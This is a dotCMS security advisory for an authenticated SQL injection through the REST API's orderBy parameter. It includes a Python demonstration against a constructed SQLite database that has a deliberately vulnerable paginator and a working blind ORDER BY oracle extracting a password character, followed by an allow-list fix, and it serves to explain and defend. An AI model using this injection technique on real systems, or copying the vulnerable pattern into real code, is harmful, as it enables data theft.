Authenticated User SQL Injection Vulnerability in api

Issue: SI-56
Date: Oct 30, 2020, 5:15:00 AM
Severity: Medium
Requires Admin Access: Yes
Fix Version: 20.10.1, 5.3.8 LTS
Credit: xiaozhicai (github)
Description:

dotCMS 5.0 through 5.3.9 allows SQL injection by an authenticated user via the system REST API, for example through the endpoint /api/v1/containers. The classes used to paginate the results of some REST requests do not sanitize the orderBy parameter, and in some cases that parameter is concatenated into the ORDER BY clause of the query, making it vulnerable to SQL injection.

A user must be an authenticated manager in the dotCMS system to exploit this vulnerability.
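To make the mechanism concrete, the following is an added illustration written for this page; it is not dotCMS code and does not reproduce the dotCMS paginator, hotfix, or schema. It uses a constructed SQLite database with a hypothetical containers table and a users table, shows why an unsanitized orderBy is dangerous even when the database rejects stacked statements (an ORDER BY expression can act as a boolean oracle over other tables), and contrasts it with an allow-list check of the column name and sort direction, which is the pattern a filter-based fix would apply.

```python
import re
import sqlite3

# Constructed sample schema for this example only (not dotCMS's tables):
# a "containers" table to paginate and a "users" table holding a secret
# an authenticated-but-unprivileged caller should never be able to read.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE containers (inode TEXT, title TEXT, mod_date TEXT);
        INSERT INTO containers VALUES ('c1', 'Header',  '2020-10-01'),
                                      ('c2', 'Footer',  '2020-10-02'),
                                      ('c3', 'Sidebar', '2020-10-03');
        CREATE TABLE users (user_id TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'hunter2');
    """)
    return con


def paginate_vulnerable(con, order_by, limit=10, offset=0):
    # The unsafe pattern: limit/offset are bound, but orderBy is spliced
    # into the SQL text unchanged because ORDER BY cannot take a bind
    # parameter for the column name.
    sql = (f"SELECT inode, title FROM containers "
           f"ORDER BY {order_by} LIMIT ? OFFSET ?")
    return [row[0] for row in con.execute(sql, (limit, offset))]


def oracle_orderby(guess_char):
    # A single ORDER BY expression (no second statement, no semicolon) whose
    # sort direction depends on a condition over a different table. When
    # the guess is right the rows come back inode-descending; otherwise the
    # CASE is NULL for every row and the ASC tiebreaker applies.
    return (f"CASE WHEN (SELECT substr(password,1,1) FROM users "
            f"WHERE user_id='admin')='{guess_char}' THEN inode END DESC, "
            f"inode ASC")


def leak_first_char(con, alphabet="abcdefghijklmnopqrstuvwxyz"):
    # Boolean-based blind extraction driven purely by result ordering.
    for ch in alphabet:
        if paginate_vulnerable(con, oracle_orderby(ch))[0] == "c3":
            return ch
    return None


# Hardened version: accept only "<known column> [asc|desc]" and rebuild the
# clause from the validated parts, never from the caller's string.
ALLOWED_COLUMNS = {"inode", "title", "mod_date"}
ORDER_BY_RE = re.compile(r"^(?P<col>[a-z_]+)(?:\s+(?P<dir>asc|desc))?$",
                         re.IGNORECASE)


def sanitize_order_by(order_by):
    m = ORDER_BY_RE.match(order_by.strip())
    if not m or m.group("col").lower() not in ALLOWED_COLUMNS:
        raise ValueError(f"invalid orderBy: {order_by!r}")
    direction = (m.group("dir") or "asc").upper()
    return f"{m.group('col').lower()} {direction}"


def paginate_safe(con, order_by, limit=10, offset=0):
    sql = (f"SELECT inode, title FROM containers "
           f"ORDER BY {sanitize_order_by(order_by)} LIMIT ? OFFSET ?")
    return [row[0] for row in con.execute(sql, (limit, offset))]


def is_rejected(order_by):
    # Convenience check: True when the hardened validator refuses the value.
    try:
        sanitize_order_by(order_by)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("leaked first password char:", leak_first_char(db))
    print("safe ordering:", paginate_safe(db, "title desc"))
    print("oracle rejected by allow-list:", is_rejected(oracle_orderby("h")))
```

The allow-list is deliberately stricter than "escape quotes" or "strip semicolons": the oracle above contains no statement separator and would survive those filters, while it cannot pass a check that only admits a known column name and an optional direction keyword.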

Mitigation:

An OSGi plugin that mitigates the issue for dotCMS versions 5.0.3 through 5.3.9 can be found here:

https://github.com/dotCMS/patches-hotfixes/tree/master/com.dotcms.rest.filtersanitizer


References

Report:
https://github.com/dotCMS/core/issues/19500

CVE:
https://nvd.nist.gov/vuln/detail/CVE-2020-27848

HotFix:
https://github.com/dotCMS/patches-hotfixes/tree/master/com.dotcms.rest.filtersanitizer

Github Issue:
https://github.com/dotCMS/core/issues/19500